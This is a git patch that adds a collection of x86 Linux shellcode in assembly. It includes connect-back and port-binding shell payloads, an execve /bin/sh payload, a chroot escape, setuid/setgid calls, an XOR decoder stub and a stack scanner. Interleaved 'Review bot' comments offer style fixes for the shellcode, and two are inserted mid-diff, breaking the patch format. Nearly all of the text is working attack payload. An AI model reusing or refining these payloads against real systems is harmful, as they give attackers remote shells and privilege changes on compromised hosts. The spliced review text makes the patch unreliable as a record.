From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001 From: Root THC Date: Tue, 24 Feb 2026 12:42:47 +0000 Subject: initial --- other/shellkit/x86_linux/AUTHORS | 5 ++ other/shellkit/x86_linux/chmod.s | 23 +++++++++ other/shellkit/x86_linux/chroot.s | 34 +++++++++++++ other/shellkit/x86_linux/codedump | Bin 0 -> 6244 bytes other/shellkit/x86_linux/connect.s | 61 +++++++++++++++++++++++ other/shellkit/x86_linux/execve | Bin 0 -> 5988 bytes other/shellkit/x86_linux/execve.s | 22 +++++++++ other/shellkit/x86_linux/exit.s | 14 ++++++ other/shellkit/x86_linux/portshell.s | 73 +++++++++++++++++++++++++++ other/shellkit/x86_linux/portshell_slice.s | 77 +++++++++++++++++++++++++++++ other/shellkit/x86_linux/read.s | 22 +++++++++ other/shellkit/x86_linux/setgid.s | 14 ++++++ other/shellkit/x86_linux/setreuid.s | 16 ++++++ other/shellkit/x86_linux/setuid.s | 14 ++++++ other/shellkit/x86_linux/spset.s | 36 ++++++++++++++ other/shellkit/x86_linux/xor.s | 24 +++++++++ 16 files changed, 435 insertions(+) create mode 100644 other/shellkit/x86_linux/AUTHORS create mode 100644 other/shellkit/x86_linux/chmod.s create mode 100644 other/shellkit/x86_linux/chroot.s create mode 100644 other/shellkit/x86_linux/codedump create mode 100644 other/shellkit/x86_linux/connect.s create mode 100644 other/shellkit/x86_linux/execve create mode 100644 other/shellkit/x86_linux/execve.s create mode 100644 other/shellkit/x86_linux/exit.s create mode 100644 other/shellkit/x86_linux/portshell.s create mode 100644 other/shellkit/x86_linux/portshell_slice.s create mode 100644 other/shellkit/x86_linux/read.s create mode 100644 other/shellkit/x86_linux/setgid.s create mode 100644 other/shellkit/x86_linux/setreuid.s create mode 100644 other/shellkit/x86_linux/setuid.s create mode 100644 other/shellkit/x86_linux/spset.s create mode 100644 other/shellkit/x86_linux/xor.s (limited to 'other/shellkit/x86_linux') 
diff --git a/other/shellkit/x86_linux/AUTHORS b/other/shellkit/x86_linux/AUTHORS
new file mode 100644
index 0000000..e5ad29f
--- /dev/null
+++ b/other/shellkit/x86_linux/AUTHORS
@@ -0,0 +1,5 @@
+files by:
+palmers / teso
+
+changed by:
+lorian / teso
diff --git a/other/shellkit/x86_linux/chmod.s b/other/shellkit/x86_linux/chmod.s
new file mode 100644
index 0000000..63efd8b
--- /dev/null
+++ b/other/shellkit/x86_linux/chmod.s
@@ -0,0 +1,23 @@
+
+ .globl cbegin
+ .globl cend
+
+
+cbegin:
+ jmp file
+
+chmod:
+ xorl %eax, %eax
+ popl %ebx
+ movb %al, 0x4(%ebx)
+ movl $0x41414141, %ecx
+
+ movb $0xf, %al
+ int $0x80
+
+file:
+ call chmod
+ .ascii ""
+
+cend:
+
diff --git a/other/shellkit/x86_linux/chroot.s b/other/shellkit/x86_linux/chroot.s
new file mode 100644
index 0000000..dd7e878
--- /dev/null
+++ b/other/shellkit/x86_linux/chroot.s
@@ -0,0 +1,34 @@
+ .globl cbegin
+ .globl cend
+
+
+cbegin:
+/* mkdir AA.. */
+ cdq
+ movl $0x73507350, %ecx
+ push %eax
+ push $0x2e2e4141
+ movl %esp, %ebx
+ movb $0x27, %al
+ int $0x80
+
+/* chroot AA.. */
+ movb $0x3d, %al
+ int $0x80
+
+/* chdir .. x 5 */
+ addb $0x2, %bl
+
+cd_loop:
+ incb %dl
+ movb $0xc, %al
+ int $0x80
+ cmp $0x6a, %dl
+ jne cd_loop
+
+/* chroot . */
+ incb %bl
+ movb $0x3d, %al
+ int $0x80
+cend:
+
diff --git a/other/shellkit/x86_linux/codedump b/other/shellkit/x86_linux/codedump
new file mode 100644
index 0000000..fe9bb8e
Binary files /dev/null and b/other/shellkit/x86_linux/codedump differ
diff --git a/other/shellkit/x86_linux/connect.s b/other/shellkit/x86_linux/connect.s
new file mode 100644
index 0000000..452a1d4
--- /dev/null
+++ b/other/shellkit/x86_linux/connect.s
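Review bot: chmod.s has no file header, so target, syntax and calling convention must be inferred from the `int $0x80` and `%`-prefixed operands; execve.s, exit.s and spset.s in the same commit open with a `/* x86/linux ... shellcode */` block naming purpose and author, and chroot.s, connect.s, portshell.s, portshell_slice.s, read.s, setgid.s, setreuid.s, setuid.s and xor.s lack one too. A header such as `/* x86/linux chmod shellcode (AT&T syntax, int $0x80 ABI) */` above `.globl cbegin` in each file would bring them in line. The exported `cbegin`/`cend` pair is likewise undocumented anywhere in the commit; a sentence in AUTHORS or a README stating that they only mark the start and end of the code range, and are not callable entry points, would stop the next maintainer from guessing.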
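Review bot: In chroot.s the loop test is written `cmp $0x6a, %dl` while every other instruction in the file carries an explicit AT&T size suffix (`movb`, `incb`, `addb`); `cmpb $0x6a, %dl` keeps the width explicit instead of inferred from the register. read.s (`push`/`pop` beside `popl`), execve.s (`push` beside `pushl`) and xor.s (`dec %cl` beside `incl`) mix the two forms the same way. The block comment `/* chdir .. x 5 */` also does not describe the loop under it, which repeats until `%dl` equals 0x6a; the comment should state the real termination condition, or the bound should be a named constant so comment and code cannot drift apart.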
@@ -0,0 +1,61 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+/* socket */
+ xorl %eax, %eax
+ cdq
+ push %eax
+ incb %al
+ movl %eax, %ebx
+ push %eax
+ incb %al
+ push %eax
+ movl %esp, %ecx
+ movb $0x66, %al
+ int $0x80
+
+/* connect */
+ movl $0x41414141, %ecx
+ xorl $0x4041413e, %ecx /* address: 127.0.0.1 */
+ push %ecx
+ pushw $0x7450
+ pushw %dx
+ movl %esp, %ecx
+ movl %eax, %edx
+
+ push $0x10
+ push %ecx
+ push %edx
+ movl %esp, %ecx
+
+ movb $0x03, %bl
+ movb $0x66, %al
+ int $0x80
+
+/* dup2 fd 0 + fd 1 */
+ movl %edx, %ebx
+ xorl %ecx, %ecx
+
+ movb $0x3f, %al
+ int $0x80
+
+ incb %cl
+ movb $0x3f, %al
+ int $0x80
+
+/* execve shell (by lorian, see execve.s) - slightly modified */
+ movb $0x0b, %al
+ cdq
+ pushl %edx
+ push $0x68732F6E
+ push $0x69622F2F
+ movl %esp, %ebx
+ pushl %edx
+ pushl %ebx
+ movl %esp, %ecx
+ int $0x80
+
+cend:
+
diff --git a/other/shellkit/x86_linux/execve b/other/shellkit/x86_linux/execve
new file mode 100644
index 0000000..3a17d3f
Binary files /dev/null and b/other/shellkit/x86_linux/execve differ
diff --git a/other/shellkit/x86_linux/execve.s b/other/shellkit/x86_linux/execve.s
new file mode 100644
index 0000000..2fdb69f
--- /dev/null
+++ b/other/shellkit/x86_linux/execve.s
@@ -0,0 +1,22 @@
+/* x86/linux execve /bin/sh shellcode
+ *
+ * lorian / teso
+ */
+
+ .globl cbegin
+ .globl cend
+
+cbegin:
+ pushl $0x0b
+ popl %eax
+ cdq
+ pushl %edx
+ push $0x68732F6E
+ push $0x69622F2F
+ movl %esp, %ebx
+ pushl %edx
+ pushl %ebx
+ movl %esp, %ecx
+ int $0x80
+
+cend:
diff --git a/other/shellkit/x86_linux/exit.s b/other/shellkit/x86_linux/exit.s
new file mode 100644
index 0000000..1fe28f6
--- /dev/null
+++ b/other/shellkit/x86_linux/exit.s
@@ -0,0 +1,14 @@
+/* x86/linux exit shellcode
+ *
+ * lorian / teso
+ */
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+ xorl %eax, %eax
+ incl %eax
+ int $0x80
+
+cend:
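Review bot: exit.s never says what exit status it reports: `xorl %eax, %eax` / `incl %eax` / `int $0x80` issues syscall 1 with `%ebx` untouched, so the status is whatever `%ebx` held on entry. A comment on the `int $0x80` line, `/* exit(%ebx): status is whatever the caller left in %ebx */`, makes that dependency explicit. More generally, each file's header should list the registers it assumes on entry, as spset.s already does for the terminator it expects in the data, so callers know which state they have to set up.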
diff --git a/other/shellkit/x86_linux/portshell.s b/other/shellkit/x86_linux/portshell.s
new file mode 100644
index 0000000..31aa68c
--- /dev/null
+++ b/other/shellkit/x86_linux/portshell.s
@@ -0,0 +1,73 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+/* socket */
+ xorl %eax, %eax
+ cdq
+ push %eax
+ incb %al
+ movl %eax, %ebx
+ push %eax
+ incb %al
+ push %eax
+ movl %esp, %ecx
+ movb $0x66, %al
+ int $0x80
+
+/* bind */
+ push %edx
+ pushw $0x7350
+ pushw %dx
+ movl %esp, %edx
+
+ push $0x10
+ push %edx
+ push %eax
+ movl %esp, %ecx
+
+ incb %bl
+ movl %eax, %edx
+ movb $0x66, %al
+ int $0x80
+
+/* listen */
+ addb $0x02, %bl
+ movb $0x66, %al
+ int $0x80
+
+/* accept */
+ push %eax
+ push %edx
+ movl %esp, %ecx
+
+ incb %bl
+ movb $0x66, %al
+ int $0x80
+
+/* dup2 fd 0 + fd 1 */
+ movl %eax, %ebx
+ xorl %ecx, %ecx
+
+ movb $0x3f, %al
+ int $0x80
+
+ incb %cl
+ movb $0x3f, %al
+ int $0x80
+
+/* execve shell (by lorian, see execve.s) - slightly modified */
+ movb $0x0b, %al
+ cdq
+ pushl %edx
+ push $0x68732F6E
+ push $0x69622F2F
+ movl %esp, %ebx
+ pushl %edx
+ pushl %ebx
+ movl %esp, %ecx
+ int $0x80
+
+cend:
+
diff --git a/other/shellkit/x86_linux/portshell_slice.s b/other/shellkit/x86_linux/portshell_slice.s
new file mode 100644
index 0000000..0d4c7b1
--- /dev/null
+++ b/other/shellkit/x86_linux/portshell_slice.s
@@ -0,0 +1,77 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+/* socket */
+ xorl %eax, %eax
+ cdq
+ push %eax
+ incb %al
+ movl %eax, %ebx
+ push %eax
+ incb %al
+ push %eax
+ movl %esp, %ecx
+ movb $0x66, %al
+ int $0x80
+
+/* bind */
+ push %edx
+ pushw $0x7350
+ pushw %dx
+ movl %esp, %edx
+
+ push $0x10
+ push %edx
+ push %eax
+ movl %esp, %ecx
+
+ incb %bl
+ movl %eax, %edx
+ movb $0x66, %al
+ int $0x80
+
+/* listen */
+ addb $0x02, %bl
+ movb $0x66, %al
+ int $0x80
+
+/* accept */
+ push %eax
+ push %edx
+ movl %esp, %ecx
+
+ incb %bl
+ movb $0x66, %al
+ int $0x80
+
+/* dup2 fd 0 + fd 1 */
+ movl %eax, %ebx
+ xorl %ecx, %ecx
+
+ movb $0x3f, %al
+ int $0x80
+
+ incb %cl
+ movb $0x3f, %al
+ int $0x80
+
+/* execve shell (by lorian, see execve.s) - slightly modified */
+ movb $0x0b, %al
+ cdq
+ pushl %edx
+/* push $0x68732F6E */
+/* push $0x69622F2F */
+ pushw $0x6873
+ pushw $0x2f6e
+ pushw $0x6962
+ pushw $0x2f2f
+ movl %esp, %ebx
+ pushl %edx
+ pushl %ebx
+ movl %esp, %ecx
+ int $0x80
+
+cend:
+
diff --git a/other/shellkit/x86_linux/read.s b/other/shellkit/x86_linux/read.s
new file mode 100644
index 0000000..870d125
--- /dev/null
+++ b/other/shellkit/x86_linux/read.s
@@ -0,0 +1,22 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+ jmp cend
+
+rrr:
+ movb $0xfa, %dl /* length */
+
+ popl %ecx /* position */
+
+ push $0x41
+ pop %ebx
+ xorb $0x41, %bl
+
+ push $0x3
+ pop %eax
+ int $0x80 /* read */
+
+cend:
+ call rrr
+
diff --git a/other/shellkit/x86_linux/setgid.s b/other/shellkit/x86_linux/setgid.s
new file mode 100644
index 0000000..0786804
--- /dev/null
+++ b/other/shellkit/x86_linux/setgid.s
@@ -0,0 +1,14 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+main:
+ pushb $0x2e
+ popl %eax
+ movw $0x4141, %ebx
+ xorw $0x4242, %ebx
+ int $0x80
+
+cend:
+
diff --git a/other/shellkit/x86_linux/setreuid.s b/other/shellkit/x86_linux/setreuid.s
new file mode 100644
index 0000000..c976312
--- /dev/null
+++ b/other/shellkit/x86_linux/setreuid.s
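Review bot: portshell_slice.s duplicates portshell.s line for line except in the execve block, where the two original `push` instructions survive as commented-out lines `/* push $0x68732F6E */` and `/* push $0x69622F2F */` above four `pushw` instructions, and nothing in the file says why the split form exists or when it is the one to use. Replace the two dead comment lines with one that states the reason, and give the file a header that names portshell.s as its origin so the two copies can be kept in step. Copying 70 lines to vary four is worth reconsidering too; an `.ifdef` around the execve block of portshell.s would leave a single copy to maintain.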
@@ -0,0 +1,16 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+main:
+ pushl $0x46
+ popl %eax
+ movw $0x4141, %ebx
+ xorw $0x4141, %ebx
+ movw $0x4242, %ecx
+ xorw $0x4242, %ecx
+ int $0x80
+
+cend:
+
diff --git a/other/shellkit/x86_linux/setuid.s b/other/shellkit/x86_linux/setuid.s
new file mode 100644
index 0000000..e78410a
--- /dev/null
+++ b/other/shellkit/x86_linux/setuid.s
@@ -0,0 +1,14 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+main:
+ pushb $0x17
+ popl %eax
+ movw $0x4141, %ebx
+ xorw $0x4242, %ebx
+ int $0x80
+
+cend:
+
diff --git a/other/shellkit/x86_linux/spset.s b/other/shellkit/x86_linux/spset.s
new file mode 100644
index 0000000..9bc19f4
--- /dev/null
+++ b/other/shellkit/x86_linux/spset.s
@@ -0,0 +1,36 @@
+/* x86 spset shellcode
+ *
+ * lorian / teso
+ */
+ .globl cbegin
+ .globl _cbegin
+ .globl cend
+ .globl _cend
+
+/* searches for 512 bytes "free" space on stack without destroying it
+ * like any kind of call would do...
+ *
+ * NOTE: your real shellcode must be terminated with
+ * \x78\x56\x34\x12 for this code to work...
+ */
+
+_cbegin:
+cbegin:
+
+ movl $0x12345678, %eax
+a:
+ cdq
+ movb $0x02, %dh
+b:
+ popl %ebx
+ pushl %ebx
+ incl %esp
+ decl %edx
+ jz c
+ cmpl %eax, %ebx
+ je a
+ jmp b
+c:
+
+_cend:
+cend:
diff --git a/other/shellkit/x86_linux/xor.s b/other/shellkit/x86_linux/xor.s
new file mode 100644
index 0000000..29e3b78
--- /dev/null
+++ b/other/shellkit/x86_linux/xor.s
@@ -0,0 +1,24 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+ jmp XOR_down
+
+XOR_up:
+ popl %ebx
+ movb $0x26, %cl /* lenght */
+
+XORLoop:
+ xorb $0x64, %bl /* xor key */
+ incl %ebx
+ dec %cl
+ jnz XORLoop
+ jmp XORLoopDone
+
+XOR_down:
+ call XOR_up
+
+XORLoopDone:
+ .ascii ""
+
+cend:
-- 
cgit v1.3
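Review bot: The labels `a:`, `b:` and `c:` in spset.s say nothing about the scan loop they structure, and without the `.L` prefix the assembler keeps them as ordinary symbols next to the exported `cbegin`/`cend`. Names such as `.Lrestart`, `.Lscan` and `.Ldone` document the control flow in place and stay out of the symbol table. The same applies to `cd_loop` in chroot.s, `rrr` in read.s, `chmod` and `file` in chmod.s, the `XOR_*` labels in xor.s, and to the `main:` label that setgid.s, setreuid.s and setuid.s place inside the `cbegin`/`cend` range, which is confusing beside a C test harness's `main` even though it is not exported.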
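Review bot: The comment on `movb $0x26, %cl /* lenght */` in xor.s misspells `length`; it should read `/* length */`. The count and the key in `xorb $0x64, %bl /* xor key */` are bare immediates, and a `.set XOR_LEN, 0x26` / `.set XOR_KEY, 0x64` pair at the top of the file would name each once, which is the usual way to keep such constants from being edited in one place and missed in another.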